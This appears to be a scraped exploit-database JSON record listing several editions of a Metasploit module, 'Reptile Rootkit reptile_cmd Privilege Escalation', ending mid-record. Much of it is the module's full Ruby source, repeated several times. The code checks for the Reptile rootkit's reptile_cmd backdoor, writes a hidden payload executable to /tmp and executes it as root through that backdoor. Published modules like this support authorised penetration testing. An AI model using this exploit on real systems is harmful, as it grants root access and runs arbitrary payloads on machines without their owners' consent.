"49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-07T03:50:54", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0180-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:1610254062230481919"]}, {"type": "cve", "idList": ["CVE-2019-20406", "CVE-2019-20400", "CVE-2020-8649", "CVE-2020-8648", "CVE-2020-8647"]}, {"type": "f5", "idList": ["F5:K50046200"]}, {"type": "centos", "idList": ["CESA-2020:0366", "CESA-2020:0375"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844327", "OPENVAS:1361412562310143480", "OPENVAS:1361412562310844329"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-3_0-0054_NXTGN.NASL", "CENTOS_RHSA-2020-0366.NASL", "UBUNTU_USN-4270-1.NASL", "UBUNTU_USN-4269-1.NASL"]}, {"type": "ubuntu", "idList": ["USN-4271-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-33909"]}], "modified": "2020-02-07T03:50:54"}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-02-07T03:50:54"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-07T03:50:54", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-07T08:13:20", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0180-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:1610254062230481919"]}, {"type": "cve", "idList": ["CVE-2019-20406", "CVE-2019-20400", "CVE-2020-8649", "CVE-2020-8647", "CVE-2020-8648"]}, {"type": "f5", "idList": ["F5:K50046200"]}, {"type": "centos", "idList": ["CESA-2020:0366", "CESA-2020:0375"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844329", "OPENVAS:1361412562310844327", "OPENVAS:1361412562310143480"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2020-3_0-0054_NXTGN.NASL", "PHOTONOS_PHSA-2020-2_0-0204_SQLITE.NASL", "CENTOS_RHSA-2020-0366.NASL"]}, {"type": "ubuntu", "idList": ["USN-4271-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-33914"]}, {"type": "exploitdb", "idList": ["EDB-ID:48014"]}], "modified": "2020-02-07T08:13:20"}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-02-07T08:13:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-07T08:13:20", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-10T09:36:23", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:3081123202340378789"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0187-1"]}, {"type": "cve", "idList": ["CVE-2012-4381", "CVE-2019-11483", "CVE-2020-8808", "CVE-2014-5468", "CVE-2013-3591"]}, {"type": "krebs", "idList": ["KREBS:C7D1AD9556F12A237F5E94231EF63BBF"]}, {"type": "f5", "idList": ["F5:K82131333"]}, {"type": "threatpost", "idList": ["THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:A34E84C2CC773995E41673206A346A8C"]}, {"type": "amazon", "idList": ["ALAS-2020-1341", "ALAS-2020-1340", "ALAS-2020-1339", "ALAS-2020-1338"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3AF4F085616D631F87CAEE8C1FD86EDF"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:3703A9704EEAA2183BC3AD96117ED5D5"]}, {"type": "canvas", "idList": ["ZABBIX"]}], "modified": "2020-02-10T09:36:23"}, "score": {"value": 3.9, "vector": "NONE", "modified": "2020-02-10T09:36:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-10T09:36:23", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-10T12:21:36", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "exploitdb", "idList": ["EDB-ID:48029"]}, {"type": "kitploit", "idList": ["KITPLOIT:3081123202340378789"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0187-1"]}, {"type": "cve", "idList": ["CVE-2012-4381", "CVE-2019-11483", "CVE-2020-8808", "CVE-2014-5468", "CVE-2013-3591"]}, {"type": "krebs", "idList": ["KREBS:C7D1AD9556F12A237F5E94231EF63BBF"]}, {"type": "f5", "idList": ["F5:K82131333"]}, {"type": "threatpost", "idList": ["THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:A34E84C2CC773995E41673206A346A8C"]}, {"type": "amazon", "idList": ["ALAS-2020-1341", "ALAS-2020-1340", "ALAS-2020-1339", "ALAS-2020-1338"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3AF4F085616D631F87CAEE8C1FD86EDF"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:3703A9704EEAA2183BC3AD96117ED5D5"]}], "modified": "2020-02-10T12:21:36"}, "score": {"value": 4.3, "vector": "NONE", "modified": "2020-02-10T12:21:36"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-10T12:21:36", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-10T16:01:15", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "securelist", "idList": ["SECURELIST:500565A1F26830A8BF29A60DE41532A0"]}, {"type": "kitploit", "idList": ["KITPLOIT:7491619584321501014", "KITPLOIT:3081123202340378789"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C25449789E0037659C9DD50CFEA4D322"]}, {"type": "exploitdb", "idList": ["EDB-ID:48038", "EDB-ID:48036", "EDB-ID:48037", "EDB-ID:48029"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892097", "OPENVAS:1361412562310892098"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0187-1"]}, {"type": "cve", "idList": ["CVE-2012-4381", "CVE-2019-11483", "CVE-2020-8808"]}, {"type": "krebs", "idList": ["KREBS:C7D1AD9556F12A237F5E94231EF63BBF"]}, {"type": "f5", "idList": ["F5:K82131333"]}, {"type": "threatpost", "idList": ["THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:A34E84C2CC773995E41673206A346A8C"]}, {"type": "amazon", "idList": ["ALAS-2020-1341"]}], "modified": "2020-02-10T16:01:15"}, "score": {"value": 4.7, "vector": "NONE", "modified": "2020-02-10T16:01:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-10T16:01:15", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-10T17:33:45", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B258927AB31D92E9C2A1A87529534044"]}, {"type": "threatpost", "idList": ["THREATPOST:B01CCD5C983AF8124696A1FDF857F08D", "THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB"]}, {"type": "securelist", "idList": ["SECURELIST:500565A1F26830A8BF29A60DE41532A0"]}, {"type": "kitploit", "idList": ["KITPLOIT:7491619584321501014", "KITPLOIT:3081123202340378789"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C25449789E0037659C9DD50CFEA4D322"]}, {"type": "exploitdb", "idList": ["EDB-ID:48038", "EDB-ID:48037", "EDB-ID:48036", "EDB-ID:48029"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892097", "OPENVAS:1361412562310892098"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0187-1"]}, {"type": "cve", "idList": ["CVE-2012-4381", "CVE-2019-11483", "CVE-2020-8808"]}, {"type": "krebs", "idList": ["KREBS:C7D1AD9556F12A237F5E94231EF63BBF"]}, {"type": "f5", "idList": ["F5:K82131333"]}], "modified": "2020-02-10T17:33:45"}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-02-10T17:33:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-10T17:33:45", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-12T09:51:19", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B0CE6C640DD3E1A8752E403D8A00FCA5", "PENTESTPARTNERS:345E0FADA7CC8B1D7EAB653B649147CE"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0208-1", "OPENSUSE-SU-2020:0209-1"]}, {"type": "krebs", "idList": ["KREBS:95DEE0244F6DE332977BB606555E5A3C"]}, {"type": "cve", "idList": ["CVE-2020-0729", "CVE-2020-1942", "CVE-2020-6417", "CVE-2020-6408", "CVE-2020-6391", "CVE-2020-6404"]}, {"type": "threatpost", "idList": ["THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:D7E85EFA2708BCF8E9777438F3726A49", "THREATPOST:A6F20078C61A1ED9A10E74F884FF3436", "THREATPOST:F0FD7151939DF8EBD6C5F30BF42E6FC6"]}, {"type": "kitploit", "idList": ["KITPLOIT:6611950990762198766"]}, {"type": "thn", "idList": ["THN:0CE5BCC7B7F94F5D8E89FEE2CDDC1F13"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5532"]}], "modified": "2020-02-12T09:51:19"}, "score": {"value": 3.2, "vector": "NONE", "modified": "2020-02-12T09:51:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-12T09:51:19", "differentElements": ["modified", "published", "sourceData"], "edition": 38}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-12T11:43:27", "history": [], "viewCount": 25, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:8162170336109838695", "KITPLOIT:6611950990762198766"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:A8BE2A224D15A94D4960B5AE70330CA3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B0CE6C640DD3E1A8752E403D8A00FCA5", "PENTESTPARTNERS:345E0FADA7CC8B1D7EAB653B649147CE"]}, {"type": "cve", "idList": ["CVE-2014-9390", "CVE-2020-0729", "CVE-2020-1942", "CVE-2009-4067", "CVE-2013-5582", "CVE-2013-0517", "CVE-2013-2057"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0208-1", "OPENSUSE-SU-2020:0209-1"]}, {"type": "cert", "idList": ["VU:597809"]}, {"type": "exploitdb", "idList": ["EDB-ID:48057"]}, {"type": "krebs", "idList": ["KREBS:95DEE0244F6DE332977BB606555E5A3C"]}, {"type": "threatpost", "idList": ["THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:D7E85EFA2708BCF8E9777438F3726A49"]}], "modified": "2020-02-12T11:43:27"}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-02-12T11:43:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root 